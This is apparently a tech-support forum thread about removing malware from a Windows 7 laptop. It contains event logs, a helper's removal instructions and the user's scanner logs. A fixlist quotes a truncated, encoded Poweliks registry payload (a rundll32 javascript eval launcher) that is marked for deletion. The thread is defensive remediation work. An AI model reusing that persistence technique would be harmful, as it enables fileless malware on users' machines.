Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea8e7
Exception code: 0xc00000fd
Fault offset: 0x0002e04e
Faulting process id: 0x2278
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/19/2014 11:46:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 10.0.9200.17116 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 2614

Start Time: 01cfec207c6bd3ce

Termination Time: 22

Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Report Id:

Error: (10/18/2014 10:51:20 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

System errors:
=============
Error: (10/29/2014 00:16:09 PM) (Source: WMPNetworkSvc) (EventID: 14346) (User: )
Description: 0x80040154

Error: (10/29/2014 00:16:09 PM) (Source: WMPNetworkSvc) (EventID: 14346) (User: )
Description: 0x80040154

Error: (10/29/2014 00:16:01 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/29/2014 00:14:30 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The regi service failed to start due to the following error:
%%2

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Diagnostic Policy Service service failed to start due to the following error:
%%1069

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The DPS service was unable to log on as NT AUTHORITY\LocalService with the currently configured password due to the following error:
%%50

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Base Filtering Engine service failed to start due to the following error:
%%1069

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The BFE service was unable to log on as NT AUTHORITY\LocalService with the currently configured password due to the following error:
%%50

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Firewall service depends on the Base Filtering Engine service which failed to start because of the following error:
%%1069

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Base Filtering Engine service failed to start due to the following error:
%%1069

Microsoft Office Sessions:
=========================
Error: (05/27/2011 10:48:56 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (09/20/2010 11:05:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.

CodeIntegrity Errors:
===================================
  Date: 2014-10-29 11:44:06.791
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\AVG\AVG2015\avghooka.dll because the set of per-page image hashes could not be found on the system.

  Date: 2009-12-02 12:51:40.835
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\swwork\DPIUP\TPDEVPE.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2009-12-02 12:51:40.835
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\swwork\DPIUP\TPDEVPE.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


Continue as follows:

Download attached fixlist.txt file (end of reply) and save it to the Desktop, or the folder you saved FRST into.

NOTE. It's important that both FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.

The tool will make a log on the Desktop (Fixlog.txt) or the folder it was run from. Please post it to your reply.

Next,

Open Malwarebytes Anti-Malware, from the Dashboard please Check for Updates by clicking the Update Now... link

When the update completes select > Settings > Detection and Protection > Enable Scan for rootkit and under Non Malware Protection set both PUP and PUM to Treat detections as malware.

Click on the SCAN button and run a Threat Scan with Malwarebytes Anti-Malware by clicking the Scan Now>> button.

When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.

In most cases, a restart will be required.

Wait for the prompt to restart the computer to appear, then click on Yes.

Once completed please click on the History > Application Logs and find your scan log and open it and then click on the "copy to clipboard" button and post back the results on your next reply.

Next,

Download AdwCleaner by Xplode onto your Desktop.


Double click on Adwcleaner.exe to run the tool.
Click on Scan
Once the scan is done, click on the Clean button.
You will get a prompt asking to close all programs. Click OK.
Click OK again to reboot your computer.
A text file will open after the restart. Please post the content of that logfile in your reply.
You can also find the logfile at C:\AdwCleaner[sn].txt, where n is the scan reference number.

Next,

Please download Junkware Removal Tool to your desktop.


Shut down your protection software now to avoid potential conflicts. (re-enable when done)
Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.

Next,

Download Microsoft's "Malicious Software Removal Tool" and save direct to the desktop

Ensure to get the correct version for your system....

32 Bit version:

https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=en

64 Bit version:

https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=585D2BDE-367F-495E-94E7-6349F4EFFC74&displaylang=en

Right click on the Tool, select "Run as Administrator"; the tool will expand to the options window

In the "Scan Type" window, select Quick Scan

Perform a scan and click Finish when the scan is done.

Retrieve the MSRT log as follows, and post it in your next reply:

1) Select the Windows key and R key together to open the "Run" function

2) Type or Copy/Paste the following command to the "Run Line" and Press Enter:

notepad c:\windows\debug\mrt.log

Let me see those logs in your next reply, also give an update on any remaining issues or concerns.

Kevin...

Fixlist.txt


Fixlog below. Will reply with Malware scan history next.

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 29-10-2014 01
Ran by Charles at 2014-10-29 17:41:20 Run:1
Running from C:\Users\Charles\Desktop
Loaded Profile: Charles (Available profiles: Charles)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
Start
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\MountPoints2: {f397cc25-9f37-11e0-9bf5-00226819c704} - D:\LaunchU3.exe
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
S2 regi; \??\C:\Windows\system32\drivers\regi.sys [X]
S3 RimUsb; System32\Drivers\RimUsb_AMD64.sys [X]
S3 vpnva; system32\DRIVERS\vpnva64.sys [X]
C:\Users\Charles\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp2qaslf.dll
C:\Users\Charles\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
AlternateDataStreams: C:\ProgramData\TEMP:40F038C5
AlternateDataStreams: C:\ProgramData\TEMP:C74D7A47
EmptyTemp:
End

*****************

"HKU\S-1-5-21-3094523011-22438472-3966868382-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{f397cc25-9f37-11e0-9bf5-00226819c704}" => Key deleted successfully.
"HKCR\CLSID\{f397cc25-9f37-11e0-9bf5-00226819c704}" => Key not found.
"HKU\S-1-5-21-3094523011-22438472-3966868382-1003\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-3094523011-22438472-3966868382-1003\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
regi => Service deleted successfully.
RimUsb => Service deleted successfully.
vpnva => Service deleted successfully.
C:\Users\Charles\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp2qaslf.dll => Moved successfully.
C:\Users\Charles\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe => Moved successfully.
"HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
C:\ProgramData\TEMP => ":40F038C5" ADS removed successfully.
C:\ProgramData\TEMP => ":C74D7A47" ADS removed successfully.
EmptyTemp: => Removed 4.1 GB temporary data.

The system needed a reboot.

==== End of Fixlog ====


Malwarebytes scan log below. AdwCleaner next.

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/29/2014
Scan Time: 6:06:30 PM
Logfile:
Administrator: Yes

Version: 2.00.3.1025
Malware Database: v2014.10.29.08
Rootkit Database: v2014.10.22.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Charles

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 341431
Time Elapsed: 21 min, 20 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)


AdwCleaner log below. Junkware removal tool next.

# AdwCleaner v3.311 - Report created 29/10/2014 at 18:34:49
# Updated 30/09/2014 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Charles - CHARLES-THINK
# Running from : C:\Users\Charles\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

Service Deleted : Viewpoint Manager Service

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\AVG Security Toolbar
Folder Deleted : C:\ProgramData\Premium
Folder Deleted : C:\ProgramData\Viewpoint
Folder Deleted : C:\Program Files (x86)\Viewpoint
Folder Deleted : C:\Program Files (x86)\Common Files\Viewpoint
File Deleted : C:\END
File Deleted : C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default\searchplugins\avg-secure-search.xml

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\VWPT
Key Deleted : HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{03F998B2-0E00-11D3-A498-00104B6EB52E}
Key Deleted : HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{1B00725B-C455-4DE6-BFB6-AD540AD427CD}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{03F998B2-0E00-11D3-A498-00104B6EB52E}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{0E2C3126-DDED-4A58-800E-9AEDE84EA31E}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1B00725B-C455-4DE6-BFB6-AD540AD427CD}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A7327C09-B521-4EDB-8509-7D2660C9EC98}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F8AD5AA5-D966-4667-9DAF-2561D68B2012}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{0B79C149-3B19-40DE-92BF-1A3AD9C1DA9D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{229C56BB-A36A-4323-8C82-B136DF45697D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{33E2B3CB-322E-4CBE-89F2-C06F5A35DB46}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{51080E66-F357-4F2A-9BFC-2456695883B5}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{537AD3CF-DE2B-4A1C-8279-C946B7E490D4}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{5BF7365D-25FF-40F3-8DEE-06ABEDF177CC}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6DDA37BA-0553-499A-AE0D-BEBA67204548}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A10A1344-B533-4C9E-BE4E-4C5BC4953047}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{BA94BCE1-7E60-422D-9E7D-B853BC03FE78}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{BDCE611F-FDAA-4B10-A8E8-220A7897A69F}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D0F1E414-1FAE-466C-B122-DE735B7BFF9D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E458510C-1DD5-4A05-8C4C-53BEF69C05E7}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{6427058B-217C-4C7F-A6CE-C7934C0BDCEB}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E060D9D9-E979-4C2F-A840-BE5150F84AC5}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A7327C09-B521-4EDB-8509-7D2660C9EC98}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{03F998B2-0E00-11D3-A498-00104B6EB52E}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{95B7759C-8C7F-4BF1-B163-73684A933233}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{A7327C09-B521-4EDB-8509-7D2660C9EC98}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F8AD5AA5-D966-4667-9DAF-2561D68B2012}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{A7327C09-B521-4EDB-8509-7D2660C9EC98}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{F8AD5AA5-D966-4667-9DAF-2561D68B2012}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{03F998B2-0E00-11D3-A498-00104B6EB52E}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{1B00725B-C455-4DE6-BFB6-AD540AD427CD}
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{F8AD5AA5-D966-4667-9DAF-2561D68B2012}]
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{30B15818-E110-4527-9C05-46ACE5A3460D}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{618AAD04-921F-44C2-BE38-C0818AF69861}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{6427058B-217C-4C7F-A6CE-C7934C0BDCEB}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B5D2ED96-62F9-4C2C-956D-E425B1F67337}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{D3A412E8-1E4B-47D2-9B12-F88291F5AFBB}
Key Deleted : HKCU\Software\AVG SafeGuard toolbar
Key Deleted : HKCU\Software\Conduit
Key Deleted : HKCU\Software\Viewpoint
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKCU\Software\Zugo
Key Deleted : HKCU\Software\AppDataLow\HavingFunOnline
Key Deleted : HKLM\SOFTWARE\AVG Secure Search
Key Deleted : HKLM\SOFTWARE\AVG Security Toolbar
Key Deleted : HKLM\SOFTWARE\bflixtoolbar
Key Deleted : HKLM\SOFTWARE\Freeze.com
Key Deleted : HKLM\SOFTWARE\Viewpoint
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Crossrider
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Viewpoint Manager
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Viewpoint Toolbar
Key Deleted : [x64] HKLM\SOFTWARE\DivX\Install\Setup\WizardLayout\ConduitToolbar

***** [ Browsers ] *****

-\\ Internet Explorer v10.0.9200.17116

-\\ Mozilla Firefox v22.0 (en-US)

[ File : C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default\prefs.js ]

Line Deleted : user_pref("plugin.blocklisted.npviewpoint", true);

*************************

AdwCleaner[R0].txt - [6569 octets] - [29/10/2014 18:33:01]
AdwCleaner[s0].txt - [6360 octets] - [29/10/2014 18:34:49]

########## EOF - C:\AdwCleaner\AdwCleaner[s0].txt - [6420 octets] ##########


Junk Removal Tool log below. Microsoft malicious program scan next (last one I believe).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.3 (10.21.2014:1)
OS: Windows 7 Home Premium x64
Ran by Charles on Wed 10/29/2014 at 18:50:45.02
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

~~~ Services

~~~ Registry Values

~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A876E312-7D08-401A-B7A6-FAFC5DC2F292}

~~~ Files

~~~ Folders

Successfully deleted: [Folder] C:\ProgramData\CodecCheck
Successfully deleted: [Folder] "C:\Program Files (x86)\crossriderwebapps"
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{100A2AD4-4EDE-48FD-9E13-FC4D7EC81BDC}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{254A52AF-D8FB-4EC9-A185-8740BBF4087F}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{29322232-83A3-4B84-8511-4B751DB262F6}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{2E5314DE-E9CD-4F43-8A06-4FE786A231AE}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{2F586B8B-3166-4F2A-9073-887D678568BE}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{4EAE486D-A5CA-447F-AED3-E795EDF04D1A}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{723F4A84-F5E5-4BAC-B425-D7BBD624BB11}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{8D92D09F-B979-4264-8E6A-4C120370733F}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{915473C0-63EE-4CEB-80AC-5A641CB1560E}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{A513F064-1951-4B77-9974-694233599CCD}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{D9332097-2DB2-41B6-BDB2-66DDBD972707}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{E526EEAC-80FB-490F-85F4-AA7198556EC7}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{EBE2C52E-A548-451F-9E4A-B499EE31642C}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{F0391DDC-F59B-49CB-B269-FA5F074934BD}
Successfully deleted: [Empty Folder] C:\Users\Charles\appdata\local\{F6FFDC3E-7653-46CE-8A54-EF52E469E0A2}

~~~ Event Viewer Logs were cleared

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 10/29/2014 at 18:56:47.67
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Here's the last one. Am I in the clear? It seems so as my laptop is not running at 95% cpu.

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.6, March 2012
Started On Sun Mar 18 18:49:54 2012

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Mar 18 18:52:16 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.7, April 2012
Started On Sat Apr 14 16:59:39 2012
->Scan ERROR: resource process://pid:524 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:7880 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:8760 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Apr 14 17:09:56 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.8, May 2012
Started On Wed May 09 22:24:12 2012
->Scan ERROR: resource process://pid:9376 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:9772 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed May 09 22:29:18 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.9, June 2012
Started On Fri Jun 15 21:45:21 2012

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Fri Jun 15 21:47:45 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.10, July 2012
Started On Sun Jul 15 22:34:01 2012

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Jul 15 22:36:47 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.11, August 2012
Started On Thu Aug 16 22:30:11 2012
->Scan ERROR: resource process://pid:5268 (code 0x00000005 (5))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Aug 16 22:32:50 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.12, September 2012
Started On Sat Sep 15 00:04:02 2012
->Scan ERROR: resource process://pid:7640 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:5316 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:5096 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:7192 (code 0x00000005 (5))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Sep 15 00:06:50 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.13, October 2012
Started On Mon Oct 15 21:48:48 2012

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Mon Oct 15 21:51:07 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.14, November 2012
Started On Tue Nov 20 22:09:45 2012
->Scan ERROR: resource process://pid:168 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:5444 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:8124 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Tue Nov 20 22:12:33 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.15, December 2012
Started On Thu Dec 13 22:22:08 2012
->Scan ERROR: resource process://pid:4860 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:3752 (code 0x00000005 (5))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Dec 13 22:26:19 2012

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.16, January 2013
Started On Thu Jan 10 21:11:57 2013
->Scan ERROR: resource process://pid:4032 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:2440 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Jan 10 21:15:52 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.17, February 2013
Started On Thu Feb 14 23:57:33 2013
->Scan ERROR: resource process://pid:2428 (code 0x00000005 (5))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Fri Feb 15 00:09:53 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.18, March 2013
Started On Thu Mar 14 03:01:23 2013
->Scan ERROR: resource process://pid:7192 (code 0x00000005 (5))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Mar 14 03:04:43 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.19, April 2013
Started On Wed Apr 10 04:37:24 2013
->Scan ERROR: resource process://pid:2364 (code 0x00000005 (5))
->Scan ERROR: resource process://pid:4188 (code 0x00000490 (1168))
->Scan ERROR: resource process://pid:3168 (code 0x00000490 (1168))

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Apr 10 04:40:17 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.20, May 2013
Started On Thu May 16 01:28:50 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu May 16 01:32:25 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.21, June 2013
Started On Thu Jun 13 23:29:35 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Jun 13 23:32:03 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------

Microsoft Windows Malicious Software Removal Tool v4.22, July 2013
Started On Wed Jul 17 09:00:05 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Jul 17 09:02:21 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.2, July 2013 (build 5.2.9201.0)
Started On Wed Jul 17 22:18:30 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Jul 17 22:22:09 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.3, August 2013 (build 5.3.9301.0)
Started On Wed Aug 28 00:26:05 2013

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Aug 28 00:31:15 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.4, September 2013 (build 5.4.9400.0)
Started On Thu Sep 12 00:18:25 2013

Engine: 1.1.9800.0
Signatures: 1.157.932.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Sep 12 00:21:45 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.5, October 2013 (build 5.5.9502.0)
Started On Sat Oct 12 17:13:08 2013

Engine: 1.1.9901.0
Signatures: 1.159.530.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Oct 12 17:21:17 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.6, November 2013 (build 5.6.9603.0)
Started On Wed Nov 13 21:18:26 2013

Engine: 1.1.10003.0
Signatures: 1.161.1618.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Nov 13 21:21:36 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.7, December 2013 (build 5.7.9701.0)
Started On Sun Dec 22 02:58:13 2013

